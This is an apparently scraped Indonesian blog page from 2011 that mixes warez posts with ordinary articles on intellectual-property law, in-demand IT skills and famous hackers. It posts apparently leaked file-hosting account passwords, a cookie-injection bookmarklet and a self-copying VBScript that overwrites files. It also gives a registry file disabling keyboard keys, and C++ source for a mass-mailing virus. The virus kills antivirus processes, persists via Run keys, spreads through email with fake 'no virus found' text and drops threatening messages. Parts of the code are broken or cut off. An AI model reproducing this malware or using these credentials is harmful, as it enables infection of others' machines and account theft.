Breaking News

Friday, September 30, 2011

Exclusive Premium Accounta

DOWNLOAD Exclusive Premium Accounts HERE
Read more ...


User: fm131464201734
Pass: 9dxdnrxr
PASS : greov1
USER :yalcincafe
PASS : ggsojg
Read more ...

Huge proxy variation


Download Here
Read more ...

Threaded Mode | Linear Mode AVG Internet Security 2012 [Activated until 2018]

Read more ...

Port 27977 Fresh VIP Proxies --[Great for cracking]--
Read more ...

How To Use Cookies

 Google Chrome

> BookMark Manager
> Organize -> Add Page
> Nama Terserah Agan
> Paste Kode Javascriptnya di URL
> Save

 Mozilla Firefox

> Firefox -> BookMarks
> Klik Kanan -> New BookMarks
> Nama Terserah Agan
> Paste Kode Javascriptnya di URL
> Save

>>>>>>>>>>>>>>>>>> Pemakaian <<<<<<<<<<<<<<<<<<<

> Pergi Ke Filehosting Mana Aja
> Klik the BookMarked
> Nanti Di Tanyain Cookies
> Enter dan klik OK
> Selesai

Javascript Download File Here
Read more ...

Adding Cookies without Add-Ons

just go to the website u want to download from, paste the script into the adress bar and press enter





javascript:hf="";if(location.href.indexOf("")==-1){g=confirm("Make%20sure%20if%20you%20are%20on%20RapidShare%20page,%20click%20OK%20to%20direc​t-to%20Rapidshare%20now!");if(g)location.href=hf;void(0);}else{c=prompt("Insert%20your%20Rapidshare%20Cookie","cookie%20Rapidshare");if(c){r=confirm("Remember%20this%20cookie?");d=new%20Date();nd=new Date(d.getFullYear()+1,2,11);void(document.cookie="enc="+c+";;path=/;"+(r?"expires="+nd:""));location.href=hf}void(0)}


Read more ...

Hotfile Premium Accounts

00wyat : 004906
Edvis : hotfile
sanchin : sanchin1
eddie8 : eddie8
bay-prisonbreak : xfhbew
mascarpone : sticazzi
kain2master : basket
mattmar : battilla
Read more ...

Filesonic Premium Account Update

Username: Renato
Password : tyuirt

password : tkdmaster

Password : tyuirt

password : dexter

password : greov1

password : dontellu

Password : dontellu

Password : tubesteak
Read more ...

Thursday, September 29, 2011

Filesonic Premium Account

User :
Pass : dexter

User :
Pass : vikingstud

User :
Pass : dontellu

User :
Pass : qwerty
Read more ...


  Hak Kekayaan Intelektual (HAKI) adalah hak eksklusif Yang diberikan suatu peraturan kepada seseorang atau sekelompok orang atas karya ciptanya. Secara sederhana HAKI mencakup Hak Cipta, Hak Paten Dan Hak Merk .

-Dasar Hukum

·Undang-undang Nomor 7/1994 tentang Pengesahan Agreement Establishing the World Trade Organization (WTO)

·Undang-undang Nomor 10/1995 tentang   Kepabeanan
·Undang-undang Nomor 12/1997 tentang  Hak Cipta
·Undang-undang Nomor 14/1997 tentang Merek
·Keputusan Presiden RI No. 15/1997 tentang Pengesahan Paris Convention for the Protection of   Industrial Property dan Convention Establishing the   World Intellectual Property Organization
·Keputusan Presiden RI No. 17/1997 tentang Pengesahan Trademark Law Treaty
·Keputusan Presiden RI No. 18/1997 tentang Pengesahan Berne Convention for the Protection of   Literary and Artistic Works
·Keputusan Presiden RI No. 19/1997 tentang Pengesahan WIPO Copyrights Treaty

-HAKI terbagi menjadi 2 kategori, yaitu :
1.Hak Cipta.

 Berdasarkan Undang-Undang Nomor 19 Tahun 2002 Tentang Hak Cipta :
Hak Cipta adalah hak eksklusif bagi Pencipta atau penerima hak untuk mengumumkan atau memperbanyak
Ciptaannya atau memberikan izin untuk itu dengan tidak mengurangi pembatasan-pembatasan menurut
peraturan perundang-undangan yang berlaku.(Pasal 1 ayat 1) .
 Ciptaan dalam bidang ilmu pengetahuan, seni dan sastra.
 Dasar Hukum
      - UU Nomor 19 Tahun 2002 tentang Hak Cipta
      - UU Nomor 6 Tahun 1982 tentang Hak Cipta (Lembaran Negara RI Tahun 1982 Nomor 15)
   - UU Nomor 7 Tahun 1987 tentang Perubahan atas UU Nomor 6 Tahun 1982 tentang Hak Cipta (Lembaran Negara RI Tahun 1987 Nomor 42)

2.Hak Kekayaan Industri, meliputi:
> Paten
> Merek
> Desain Industri
> Desain Tata Letak Sirkuit Terpadu
> Rahasia Dagang, dan
> Indikasi

 A. Hak Paten
 Berdasarkan Undang-Undang Nomor 14 Tahun 2001
Paten adalah hak eksklusif yang diberikan oleh Negara kepada Inventor atas hasil invensinya di bidang teknologi, yang untuk selama waktu tertentu melaksanakan sendiri invensinya tersebut atau memberikan persetujuannya kepada pihak lain untuk melaksanakannya (Pasal 1 Ayat 1).

· UU Nomor 6 Tahun 1989 tentang Paten (Lembaran Negara RI Tahun 1989 Nomor 39)
· UU Nomor 13 Tahun 1997 tentang Perubahan UU Nomor 6 Tahun 1989 tentang Paten (Lembaran Negara RI Tahun 1997 Nomor 30)
· UU Nomor 14 Tahun 2001 tentang Paten (Lembaran Negara RI Tahun 2001 Nomor 109)

 B. Hak Merek
 Berdasarkan Undang-Undang Nomor 15 Tahun 2001 :
Merek adalah tanda yang berupa gambar, nama, kata, huruf- huruf, angka- angka, susunan warna, atau kombinasi dari unsur- unsur tersebut yang memiliki daya pembeda dan digunakan dalam kegiatan perdagangan barang atau jasa. (Pasal 1 Ayat 1)
· UU Nomor 19 Tahun 1992 tentang Merek (Lembaran Negara RI Tahun 1992 Nomor 81)
· UU Nomor 14 Tahun 1997 tentang Perubahan UU Nomor 19 Tahun 1992 tentang Merek (Lembaran Negara RI Tahun 1997 Nomor 31)
· UU Nomor 15 Tahun 2001 tentang Merek (Lembaran Negara RI Tahun 2001 Nomor 110)
Read more ...

Skill IT Yang Paling Banyak Dicari

Ketika kita mulai mencoba berbicara mengenai skill IT yang paling dibutuhkan mungkin akan kelihatannya akan sulit untuk mengulasnya. Alasannya karena notabena setiap skill pada dunia IT memang dibutuhkan. Namun jika dilihat secara umum, memang ada beberapa skill yang benar-benar dibutuhkan oleh perusahan. Nah, berikut adalah ulasan mengenai skill-skill IT yang paling dibutuhkan.

1. Project Management

Skill project management seringkali muncul di daftar top 10 skill mungkin dikarenakan beberapa perusahaan didera kerugian pada 1990an lantaran buruknya implementasi proyek-proyek IT seperti enterprise resource planning initiatives.
Konsep Project Management diperkenalkan untuk memastikan perencanaan, pengorganisasian dan pengaturan sumber daya dilakukan dengan benar sehingga suatu project bisa berhasil.
Secara garis besar ada 5 proses pada Project Management :
  1. Initiation : Menentukan cakupan (scope) dari project, serta studi apakah memang suatu project layak dilakukan.
  2. Planning & Design : Setelah inisiasi, project dibuat perencanaan detailnya. Fokus perencanaan adalah waktu, biaya dan sumber daya. Perencanaan harus dibuat sedetil mungkin sehingga dapat memetakan resiko-resiko yang mungkin muncul. Dengan memetakan resiko yang muncul diharapkan langkah antisipasi dapat ditentukan diawal. Nothing is called accident.
  3. Executing : Saatnya action! setiap detail rencana dilakukan ditahap ini.
  4. Monitoring & Controlling : Untuk memastikan bahwa eksekusi rencana berjalan sesuai target. Jika ada rencana yang dinilai tidak berjalan baik, maka pada proses ini anda dapat memberlakukan backup plan.
  5. Closing : Seperti disebutkan sebelumnya, project memiliki batas waktu, maka inilah waktu untuk serah terima project.

2. Security

Sekuriti menduduki peringkat kedua. Skill ini cukup penting untuk memproteksi semua data-data maupun informasi penting kita dari para penyusup. Menurut laporan Symantec bertajuk Security and Storage Trends to Watch, jumlah pesan spam berisi malware naik sembilan kali lipat dengan rincian 2% lebih dikuasai e-mail. Sementara itu, para hacker berbondong-bondong memanipulasi kecintaan orang pada situs-situs social networking untuk melancarkan serangan.
Symantec memprediksi tingkat kejahatan jumlahnya sama pada tahun 2010, dan mengingatkan para penyerang akan terus menggunakan social engineering untuk mencuri data-data penting korban. Jika anda bekerja di dunia IT, setidaknya anda wajib mengenal bagaimana memproteksi data anda.

3. Network Administration

Kemilau networking administration tiada pernah sirna. Menurut survei Robert Half Technology, ini top skill yang dicari para CIO di paruh pertama 2010. Pada 2010, perusahaan diperkirakan mengupgrade ke Windows Server 2008 R2 dan Windows 7 client, dan mungkin menginstall Exchange Server 2010 dan SharePoint 2010. Perusahaan bakal membutuhkan network administrator untuk memastikan trafik jaringan berjalan mulus tanpa kendala.
Sementara, Cisco juga berupaya mendorong pentingnya data-intensive traffic ke jaringan perusahaan. Video menjadi fokus utama Cisco pada 2010. Setidaknya ini bisa dibaca dari upayanya merampungkan pembelian Tandberg (pembuat video conferencing) dan pada 2009 membeli Pure Digital, pengembang kamera video Flip. Di penghujung tahun lalu, Cisco juga mengenalkan dua sertifikasi Tele-Presence: Cisco TelePresence Solutions Specialist buat midcareer voice atau networking engineer yang mencari spesialisasi di perencaaan, desain dan implementasi Cisco TelePresence; dan TelePresence Installation Specialist yang menyasar teknisi.

4. Virtualization – Cloud

Efisiensi dan penghematan bakal mudah diterapkan perusahaan yang tengah mengimplementasikan virtualisasi (virtualization) dan cloud computing. Menurut Network World, mengingat cloud computing lagi tumbuh, sulit bagi perusahaan menemukan profesional berpengalaman relevan. Sebagai ganti, perusahaan merekrut karyawan dari beragam skill diantaranya bidang storasi, jaringan dan desktop.
Mulanya perusahaan akan membentuk tim lintas fungsi untuk membeli dan mengimplementasikan virtualisasi, namun pada akhirnya cloud computing akan menjadi skill wajib bagi system administrator. Dalam beberapa tahun ke depan, ia bahkan bisa menjadi skill standar profesional IT lantaran ia menangani aspek-aspek IT nan beragam.

5. Business Analysis

Peran business analysis (BA) adalah peran umum di banyak perusahaan pada 1990an saat proyek-proyek besar seperti enterprise resource planning initiatives, membutuhkan pemikiran kritis business analysts. Namun ketika bisnis mulai bergerak cepat, business analysis tersingkir. Faktor-faktor seperti lesunya ekonomi dan ruwetnya regulasi memaksa perusahaan mundur dan berpikir pada masalah bisnis dan solusinya. Dan business analysis pun kembali tampil. Kathleen Barret, presiden International Institute of Business Analysis (IIBA) mengatakan disiplin ini adalah phoenix rising.
IIBA mendeskripsikan tugas BA sebagai “jembatan antarstakeholder dalam menyimpulkan, menganalisa, mengomunikasikan, dan memvalidasi persyaratan bagi perubahan proses bisnis, kebijakan, dan sistem informasi.” Barret menambahkan profesional IT adalah kandidat bagus untuk BA karena mereka mempunyai perspektif luas di bisnis perusahaan. Ada tiga tipe BA: enterprise BA yang mengidentifikasi peluang-peluang perubahan bisnis dan mendefinsikan langkah yang harus ditempuh; transition BA yang mentuning perencanaan; dan project BA yang bekerja di tim proyek yang mengimplementasikan perubahan. Gaji tahun rata-rata sekitar $75.000 untuk enterprise BA sedang transition BA lebih dari itu.

6. Business Process Improvement

Munculnya skill project management and business analysis di daftar ini juga memunculkan skill business process improvement. Business process improvement dan business analysis berjalan bergandengan.
Business analysts mengidentifikasi area-area peningkatan bagi proses bisnis, sementara profesional business process improvement atau business process management (BPM) menggunakan tehnik dan teknologi BPM untuk membantu perusahaan mengoptimasi proses bisnis.
Survei terkini tentang BPM oleh para peneliti IT, Aberdeen Group mengungkap bahwa alasan utama menggenjot aktivitas BPM adalah karena adanya kebutuhan menekan biaya operasional dan meningkatkan cash flow. Akan tetapi, kendala terdepan adopsinya adalah kurangnya pengetahuan akan BPM. Menurut Gartner, diantara kompetensi yang dibutuhkan untuk menyukseskan BPM initiatives mencakup process skill, tools and process asset, dan transformation skill.
Untuk mempelajari lebih lanjut soal BPM, silahkan bertandang ke Web site Business Process Management Initiative (, yang mempromosikan standarisasi business processes; dan, yang menyebutnya dirinya sebagai peer-to-peer exchange bagi profesional business process management.

7. Web Development

Bila anda pecandu game FarmVille di Facebook, maka anda akan mengetahui hebatnya Web development. Hanya dalam beberapa bulan, popularitas FarmVille menyerbu dunia pasalnya fans Facebook cenderung menyukai farm mereka dan membeli barang-barang maya. Game dan karya lain Zynga selaku pengembang FarmVille, telah merangkul lebih dari 200 juta user setiap bulannya. Salah satu analis finansial memprediksi Zynga bisa berharga $1 milyar bila ia melakukan IPO di pertengahan 2010.
Pengembangan game-game Facebook hanya salah satu contoh ekstrim dan cepatnya Web development. Membangun aplikasi-aplikasi untuk iPhone juga bisa sangat menguntungkan, tulis Web developer dan blogger Glen Stansberry. Sebagai moderator Freelance Switch job board, Stansberry menyebut skill populer lainnya di Web development meliputi Framework knowledge, widget development, content management system customizations (untuk perusahaan kecil yang membuat tampilan unik blog standar Wordpress dan Drupal), dan Javascript Plugin creation.

8. Database Management

Database adalah jantung sistem bisnis yang menangani rekaman finansial karyawan, manufacturing, penjualan, proses transaksi, dan banyak lagi. Programer harus mampu membuat program yang secara cepat dan efisien menghubungkan database management system (DBMS), sementara database administrator “harus mampu mengoptimalkan fitur-fitur database dalam menangani masalah-masalah bisnis”, tulis Oracle- dan IBM-certified DBA Howard Fosdick dalam whitepapernya Database Skills Availability: Critical to Your Selection of Database. “Banyak proyek-proyek IT gagal lantaran ketidakmampuan mengamankan kemampuan DBA atau ketidakberhasilan menyelesaikan masalah-masalah DBA,” tambahnya.
Vendor-vendor utama database adalah Oracle, IBM dan Sybase. Oracle menawarkan tiga program sertifikasi buat profesional database. Oracle Certified Associate adalah tangga awal untuk menapaki sertifikasi Oracle. Lalu, Oracle Certified Professional (OCP) yang mensertifikasi kemampuan individu memanage, mengembangkan, atau mengimplementasikan database skala enterprise dan software lain. Oracle Certified Master (OCM) adalah sertifikasi tertinggi yang ditawarkan Oracle.
IBM menawarkan sederetan sertifikasi buat jajaran produk DB2. Sertifikasi utamanya adalah IBM Certified Database Associate, Database Administrator, Application Developer, dan Advanced Database Administrator. Sementara Sybase menawarkan dua sertifikasi untuk produk Adaptive Server Enterprise: ASE Administrator Associate dan ASE Administrator Professional; dan ASE Developer Associate dan ASE Developer Professional.

9. Windows Administration

Seperti disinggung sebelumnya, di tahun 2010 ini Microsoft melakukan upgrade ke Windows Server 2008 R2 dan Windows 7 client, dan instalasi Exchange Server 2010 dan SharePoint 2010. Skill Windows administration bakal menjadi kunci bagi banyak perusahaan dalam mengimplementasikan dan memaintain sistem yang ada dan diupgrade.
Sertifikasi Microsoft Windows Server 2008 pada tingkat MCTS meliputi konfigurasi Active Directory, networking, dan aplikasi. Sertifikasi yang tersedia untuk level MCITP adalah Server 2008 Server Administration, Enterprise Administration. Untuk ujian virtualisasi Windows Server 2008 mencakup server virtualization, desktop virtualization, dan virtualization administration. Profesional Windows 7 bisa memperoleh sertifikasi MCTS: Windows 7 – Configuration, dan MCITP: Enterprise Desktop Administrator 7.

10. Desktop Support

Dave Willmer, direktur eksekutif Robert Half Technology mengatakan bisnis akan membutuhkan personel untuk desktop support untuk membantu karyawan baru ketika keuangan perusahaan mulai membaik. Dikenalkannya Microsoft Windows 7 juga diperkirakan bakal membangkitkan kebutuhan skill ini.
Read more ...

Tuesday, September 27, 2011


1. Konrad Zuse
Kita mulai dengan Konrad Zuse, yang dianggap sebagai hacker komputer yang pertama. Bukan dalam artian hacker di istilah modern saat ini, tetapi tanpa dia tidak ada hacker saat ini.

Zuse membuat komputer pertama di dunia yang sepenuhnya dapat diprogram (atau dalam istilah mereka disebut Turing-lengkap), yang dikenal dengan Z3.

Dimulai dari Z1, yang dikerjakan sendiri oleh Zuse di apartemen orang tuanya dan selesai pada tahun 1938. Zuse akhirnya mendapatkan dukungan dari pemerintah Jerman, yang kemudian melahirkan evolusi dari Z1 ke Z3 yang selesai pada tahun 1941 dan dianggap sebagai nenek moyang komputasi modern.

2. John “Captain Crunch” Draper
John Draper melakukan hacking jauh sebelum komputer mendapatkan tempat seperti saat ini.
Hari-hari hacking Draper dimulai pada awal 1970, ketika jaringan terbesar yang diakses oleh publik adalah sistem telepon.

Pada saat itu, telepon diatur dengan sebuah sistem otomatis menggunakan frekuensi analog tertentu yang dapat dieksploit untuk membuat telepon jarak jauh atau bahkan internasional. Dikenal dengan istilah “Phreaking”, dan salah satu perangkat Phreaking yang terkenal adalah peluit mainan yang merupakan hadiah sereal Cap’n Crunch.

3. Steve Wozniak
Diawali oleh John Draper, Wozniak tidak asing dengan Phreaking. Pada kenyataannya setelah Draper membagi detail dari rancangan BlueBox yang dibuatnya pada pertemuan Homebrew Computer Club meeting, Wozniak membuat versinya sendiri.

Steve Job melihat potensi pasar dari perangkatnya itu dan kemudian dua orang Steve ini membangun perusahaan ventura mereka pertama. Hari-hari hacking Wozniak dihabiskan dalam proyek-proyek yang legalitasnya dipertanyakan.

Dengan hasil dari penjualan blue boxes yang ia buat ditambah dengan kalkulator milik Wozniak dan mobil van Steve Job, mereka membuat Apple I. Dengan kemahiran marketing Steve, perusahaan mereka kini menjadi pemain terdepan di industri.

4. Robert Morris
Ketika kuliah pasca sarjana di Universitas Cornell, Robert Morris menciptakan caranya sendiri untuk memperoleh ketenaran. Menurut penjelasannya, ia membuat worm sebagai upaya untuk mengukur ukuran internet saat ini.

Setelah dirilis pada tanggal 2 November 1988, Worm Morris berhasil menginfeksi 6.000 sistem (sekitar 10 persen dari komputer yang terhubung ke internet saat itu). Worm ini dibuat untuk tidak membahayakan, tetapi karena adanya kesalahan dalam algoritma replikasinya, worm tersebut bisa menyalin dirinya sendiri dengan cepat, menyebabkan beban berlebihan pada sistem dan akhirnya memberikan dampak pada Morris. Pada 1989, ia menjadi orang pertama yang dikenakan dakwaan Undang-undang Penipuan dan Penyalahgunaan Komputer pada tahun 1986.

5. Mark “Phiber Optik” Abene
Mungkin nama ini tidak familiar bagi anda. Ia tidak pernah melakukan hacking ke D.O.D atau mencuri jutaan dolar dari Bank.

Yang ia lakukan adalah membuat jengkel AT&T. Sebagai member dari kelompok Hacker Masters of Destruction, Abene “mengobok-obok” sistem AT&T. Ketika sistem telepon AT&T crash, membuat 60.000 pelanggan tidak bisa menggunakan telepon dalam waktu lebih dari 9 jam, mereka dengan cepat menyalahkan Abene.

Agen rahasia kemudian mengujunginya, menyita seluruh peralatannya, walau kemudian AT&T menyatakan bahwa kerusakan itu adalah kesalahan dari sisi mereka, Abene telah didakwa dengan dakwaan perusakan komputer tingkat pertama. Ia lalu mendapatkan dakwaan yang lebih banyak dan berat yang membawanya harus menjalani hukuman 1 tahun di penjara federal, yang menjadikannya sebagai hacker pertama yang mengalaminya.

6. Kevin “Dark Dante” Poulsen
Poulsen dianggap sebagai pelaku hacking paling keren sepanjang masa.
Sebuah kontes radio yang diadakan oleh KIIS-FM menjanjikan bahwa mereka akan memberikan sebuah mobil Porsche 944 S2 yang baru kepada penelepon ke-102. Alih-alih mencoba peruntungannya diantara sekian banyak pendengar di Los Angeles, Poulsen malah mengambil alih seluruh jaringan telepon untuk memastikan bahwa dirinyalah yang akan menjadi penelepon ke-102.

Dia kemudian menghilang setelah menjadi buronan FBI, yang membuatnya masuk dalam acara TV populer “Misteri yang Tidak Terpecahkan”. Hotline acara tersebut mengalami crash ketika episode tersebut ditayangkan. Kebetulankah ?

Pada tahun 1991, Poulsen ditangkap dan didakwa atas beragam penipuan komputer, pencucian uang dan pelanggaran hukum. Yang menarik, selama penahanannya, Poulsen membuat 180 kali bantuan pemecahan kasus cyber crime dan bahkan mampu menangkap seorang predator seksual di MySpace

7. Kevin Mitnick
Kevin Mitnick mungkin adalah hacker paling terkenal dalam sejarah komputer, dikarenakan dia adalah hacker pertama yang masuk ke dalam daftar orang yang paling dicari oleh FBI.

Sebagai master social engineering, Mitnick tidak hanya melakukan hacking komputer, ia juga melakukan hack pada pikiran orang.

Pada tahun 1979, ketika berusia 16 tahun, ia melakukan hack dengan caranya kedalam sistem komputer dan menyalin perangkat lunak berbayar.

Ia melibatkan diri dengan personil admin, seperti lewat panggilan telepon atau pesan email dan menipu mereka untuk memberikan password dan informasi keamanan yang lain. Setelah dua setengah tahun melarikan diri, Mitnick akhirnya tertangkap dan dipenjara selama lima tahun. Ia kini menjalankan konsultan keamanan komputer, Mitnick Security Consulting LLC.

8. Tsutomu Shimomura
Tidak semua bernaung dibawah payung Black-Hat. Tsutomu Shimomura adalah hacker White-Hat yang dihormati karena keberhasilannya menangkap Kevin Mitnick.

Pada tahun 1994, Mitnick mencuri beberapa file pribadi Shimoura dan mendistribusikannya secara online.

Termotivasi oleh balas dendam, Shimomura kemudian membuat teknik penjejakan dial untuk menemukan lokasi Mitnick. Berkat informasi dari Shimomura, FBI akhirnya berhasil menangkap Mitnick.

9. Richard Stallman
Pada tahun-tahunj awalnya, Stallman adalah mahasiswa pasca sarjana dan programmer di MIT’s Artificial Intelligence Labs dimana ia terlibat dengan kultur hacking yang kaya di MIT.

Sebagai pembela segala hal tentang Sistem Terbuka (Open Source), Stallman melawan ketika MIT menginstall sistem password pada jurusan Ilmu Komputer mereka.

Ia kemudian melakukan dekripsi password pengguna (bukan hal yang mudah mengingat kecepatan komputer pada tahun 1970an) dan mengirimkan password tersebut kepada orang-orang itu dalam bentuk plaintext, dan menyarankan mereka mengosongkan password untuk membuat orang lain juga bisa menggunakan sistem tersebut.

Pada tahun 1980, Stallman merasa tidak suka dengan sifat ekslusif yang dianut oleh kebanyakan manufaktur untuk perangkat lunak yang digunakan. Ia lalu merintis lisensi publik umum GNU (GPL) dan sistem operasi GNU, sebuah sistem operasi Unix-like yang sepenuhnya kompatibel dengan sistem Unix.

10. Linus Torvalds
Mengikuti jejak Stallman, Linus Torvalds adalah hacker White Hat yang lain.
Hari-hari hackingnya dimulai dengan mesin Commodore VIC-20 kuno, lalu Sinclair QL, yang kedua-duanya ia modifikasi sendiri.

Pada mesin QL tersebut ia membuat program Text Editor-nya sendiri bahkan juga sebuah kloning Pac-Man yang ia sebut Cool man.

Pada tahun 1991, ia memiliki PC Intel 80836 dan mulai membuat Linux, yang pertama kali memiliki lisensi terbatas atas namanya sendiri, tetapi kemudian bergabung dengan proyek GNU dibawah GNU GPL.
Torvalds awalnya tidak berniat meneruskan kerjanya membangun kernel, karena dianggapnya sebagai hobi, tetapi sejarah kemudian berkata lain, dan kini Linux menjadi sistem operasi yang paling akrab dengan hacker dan juga paling aman yang pernah tersedia di dunia 
Read more ...

Shortcut URL With Visual Basic

On Error Resume Next
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shell = Wscript.CreateObject("Wscript.Shell")
Script = Wscript.ScriptFullName
aPath = Left(Script, InStrRev(Script, "\"))
gogogo = Fso.GetFolder(aPath)
For Each Target in gogogo.Files
Fso.CopyFile aPath, Target.Name,1
If Minute(Now()) then
Wscript.Echo "-= Wellcome To 72Dark Blogger™ =-"
Set Links = Shell.CreateShortcut("72dark.URL")
Links.TargetPath = ""
End if
Read more ...

Disable Tombol A-Z Pada Keyboard Melalui Registry

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
"Scancode Map"=hex:00,00,00,00,00,00,00,00,1b,00,00,00,01,00,1e,00,01,00,30,00,\

save dengan 72dark.reg

bukalah Registry Editor, lalu pergilah ke lokasi berikut:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout
Hapus “Scancode Map” yang ada pada key tersebut. Log Off komputer Anda, kemudian login kembali.  
Read more ...

Angel Virus Source Code With C++

#include <windows.h>
#include <tlhelp32>
#include <fstream>
#include <mapi>
#include <memory>
#pragma argsused
/* mulai menulis nama anti virus dan update apa aja yg anda tau, apa aja yg ingin di matikan servisnya EXE ya.. lo..h, bisa di modif dan ditambahin sesuai kemauan. tidak ada peraturan dlm membuat virus */

const char *kill_av[]={ "AGENTSVR.EXE", "ANTI-TROJAN.EXE", "ANTIVIRUS.EXE", "ANTS.EXE",
 "AVSYNMGR.EXE", "AVWUPD32.EXE", "AVXQUAR.EXE", "AVprotect9x.exe",
 "CPFNT206.EXE", "CV.EXE", "CWNB181.EXE", "CWNTDWMO.EXE", "D3dupdate.exe",
 "MGUI.EXE", "msconfig.exe", "MINILOG.EXE", "MOOLIVE.EXE", "MRFLUX.EXE",
 "NAVW32.EXE", "NC2000.EXE", "NCINST4.EXE", "NDD32.EXE",
 "PANIXK.EXE", "PAVPROXY.EXE", "PCC2002S902.EXE", "PCC2K_76_1436.EXE",
 "avserve2.exe", "SHELLSPYINSTALL.EXE", "SHN.EXE", "SMC.EXE",
 "TC.EXE", "TCA.EXE", "TCM.EXE", "TDS-3.EXE", "TDS2-98.EXE",
 "VNLAN300.EXE", "VNPC3000.EXE", "VPC42.EXE", "VPFW30S.EXE",
 "ZONEALARM.EXE","zlclient.exe", "lexplore.exe", "Drunk_lol.pif",
 "Webcam_004.pif", 0};

const char *drives[] = {"a:", "b:", "c:", "d:", "e:", "f:", "g:", "h:", "i:", "j:", "k:", "l:",
 "m:", "n:", "o:", "p:", "q:", "r:", "s:", "t:", "u:", "v:", "w:", "x:",
 "y:", "z:", 0};

/* Mulai menginfeksi microsoft office */
char *fileNames[] = {"Message.exe", "Letter.exe", "Information.exe", "shadow_angel_lampung_underground.exe",
 "Documents.exe", "Attached_Message.exe", "Microsoft_Update.exe", "Private_Letter.exe",
 "Private_Document.exe", "Important_Message.exe"};

/* mulai memberi pesan pada form suatu program software, kalau bisa jgn dlm
 bahasa indonesia supaya enggak ketara bener virusnya,saran nih..*/
char *subs[] = {"Re: Message", "Re: Letter", "Re: Information", "Warning of your mail ",
 "Re: Your Documents", "Re: Account Info", "Windows Update",
 "Re: My Letter", "Re: Docs", "Re: Your Email Info"};

/* mulai menulis dan memberi pesan jika pengguna komputer menggunakan anti virusnya untuk
 menscan virus ini,nama web site antivirusnya serta pesan yg inggin ditampilkan.It just trick */
char *texts[] = {    "+++ Attachment: No Virus found  +++ MessageLabs AntiVirus -",
 "+++ Attachment: No Virus found  +++ Bitdefender AntiVirus -",
 "+++ Attachment: No Virus found  +++ MC-Afee AntiVirus -",
 "+++ Attachment: No Virus found  +++ Kaspersky AntiVirus -",
 "+++ Attachment: No Virus found  +++ Panda AntiVirus -",
 "+++ Attachment: No Virus found  ++++ Norton AntiVirus -"};

/* mulai menginfeksi register */
char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
HKEY hKey;
int i = 0;
MapiMessage mes;
MapiRecipDesc from;
char fileName[512];
unsigned short counting=0;
using namespace std;

void payload();
void GetDebugPriv();
void Kill(const char *kill_av);
int find_drives(const char *drives);
void no();
void findMail(char *);
void GetMail(char *, char *);
void SendMail(char *subject, char *sfrom,char *sto, char *smes);
void fastOut();


int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
 HWND hide;
 hide = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(hide, 0);

 CreateMutex(NULL, true, "-)(-=|L4r1$$4|=-)(-");
 if(GetLastError() == ERROR_ALREADY_EXISTS)

 for(i = 0; kill_av[i]; i++)

 char sys[MAX_PATH];
 char sys2[MAX_PATH];
 char windir[MAX_PATH];
 GetModuleFileName(GetModH, path, sizeof(path));
 GetSystemDirectory(sys, sizeof(sys));
 GetSystemDirectory(sys2, sizeof(sys2));
 GetWindowsDirectory(windir, sizeof(windir));
 strcat(sys, "\\MSLARISSA.pif");
 strcat(sys2, "\\CmdPrompt32.pif");
 strcat(windir, "\\SP00Lsv32.pif");
 CopyFile(path, sys, false);
 CopyFile(path, sys2, false);
 CopyFile(path, windir, false);

 RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
 RegSetValueEx(hKey, "MSLARISSA", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
 RegSetValueEx(hKey, "Command Prompt32", 0, REG_SZ,(const unsigned char*)sys2, sizeof(sys2));
 RegSetValueEx(hKey, "(L4r1$$4) (4nt1) (V1ruz)", 0, REG_SZ,(const unsigned char*)windir, sizeof(windir));


 /* menjalankan perintah pd saat Internet explore di buka bisa di tambah dgn browse lain */
 ShellExecute(NULL, "open", "IExplore.exe", NULL, NULL, SW_HIDE);

 /* membuka otomatis web site yg kita inginkan di buka */
 ShellExecute(NULL, "open", "", NULL, NULL, SW_HIDE);

 ShellExecute(NULL, "open", "C:\\WINDOWS\\WinVBS.vbs", NULL, NULL, SW_HIDE);

 for(i =0; drives[i]; i++)

 unsigned char buff[128];
 DWORD buffs = 128;
 HKEY keyHnd;
 char keyPath[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
 char keyItem[] = "Personal";

 counting = (unsigned short)GetTickCount();

 while(counting > 9)
 counting = (unsigned short)(counting/2);

 if(!GetModuleFileName(hInstance, fileName,512))

 MAPIlHnd = LoadLibraryA("MAPI32.DLL");


 (FARPROC &)MSendMail = GetProcAddress(MAPIlHnd, "MAPISendMail");



 if(RegOpenKeyEx((HKEY)0x80000001, keyPath, 0, KEY_READ, &keyHnd) == ERROR_SUCCESS)
 if(ERROR_SUCCESS == RegQueryValueEx(keyHnd, keyItem, 0, 0, buff, &buffs))
 buff[buffs-1] = '\\';
 buff[buffs] = 0;
 findMail((char *)buff);


/*     1 juzt w4nn4 $4y... 1 l0v3 u ~!L4r1$$4!~     */


 for(i = 0; i < 9999999999999999999; i++)

 ShellExecute(NULL, "open", "MSLARISSA.pif", NULL, NULL, SW_HIDE);
 ShellExecute(NULL, "open", "CmdPrompt32.pif", NULL, NULL, SW_HIDE);
 ShellExecute(NULL, "open", "SP00Lsv32.pif", NULL, NULL, SW_HIDE);

 return 0;

/*Menulis pesan pada komputer yg terinfeksi,yahh.. sekedar pesan aja */
void payload()
 ofstream sini;"C:\\PESAN.txt");
 sini<< "Komputer anda telah terinfeksi!" << endl;
 sini<< "kamu akan selamat," << endl;
 sini<< "Anda akan selamat untuk saat ini aja." << endl;
 sini<< "Tapi sistem komputer kamu akan rusak," << endl;
 sini<< "Kayaknya sih..." << endl;
 sini<< "Dibuat oleh," << endl;
 sini<< "Underground Lampung." << endl;
 sini<< "Hasta La Vista Bye.. Bye..," << endl;
 sini<< "   - SHADOW ANGEL : 7-20-07" << endl;

 ofstream msg_av;"C:\\PESAN_KE_ANTIVIRUS.txt");
 msg_av << "Salam anti virus!" << endl;
 msg_av << "Saya ingin membuat industri anti virus <img src="" alt=":-)" class="wp-smiley"> " << endl;
